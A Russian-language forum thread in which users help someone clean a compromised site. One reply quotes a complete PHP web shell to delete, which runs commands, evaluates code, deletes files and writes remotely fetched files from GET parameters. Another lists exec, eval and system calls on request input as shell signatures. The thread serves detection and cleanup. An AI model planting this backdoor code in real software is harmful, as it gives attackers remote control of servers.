203138894 , а его как удалять?

Удали вот это:
<?

if($_GET['cmd']){echo exec($_GET['cmd']);}

if($_GET['eval']){echo eval($_GET['eval']);}

if($_GET['unlink']){echo unlink($_GET['unlink']);}

if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}

?>
В других файлах может быть ещё подобный шелл код

Бери чистый двиг дцмс 2.4
Выдерны модули от движка други которые тебе надо, проверяй чательно и установки на их на новый дцмс. Это самый лучший вариант.
________
посл. ред. 27.03.2019 в 20:22; всего 1 раз(а); by 203138894

203138894 , этот код я нашел. Не факт что такой же у меня есть в скрипте. Значит подобное exec означает что шел верно?

Exec($_GET['cmd']);

Eval($_GET['cmd']);

System($_GET['cmd']);
Это веб шеллы.


Есть ещё обичные шелл которые как файловый менеджер.

Советую тебе поменять двиг, я не юзал скрипт други но вангую там дыр не менее 20.
Бери Джон или дцмс 2.4. Или хотя бы стронг.

203138894 , а можешь ссылку дать на них? Если конечно тебе не трудно

Дцмс 2.1 https://bym.guru/comments.php?module=downloads&item_id=75271&return=https%3A%2F%2Fbym.guru%2Fdownloads%2Fview%2F75271
Версию 2.5 тут походу нет. Этот 100500 раз безопаснее чем други. Но так как это не из источника советую все же проверять.

Пардон, не совсем та ссылка была. https://bym.guru/downloads/view/75271

203138894 , попробую. Спасибо тебе большое за помощь.
Всё таки есть добрые люди которые и помогут и подскажут что да как.
если что могу обратится ? В плане модулей?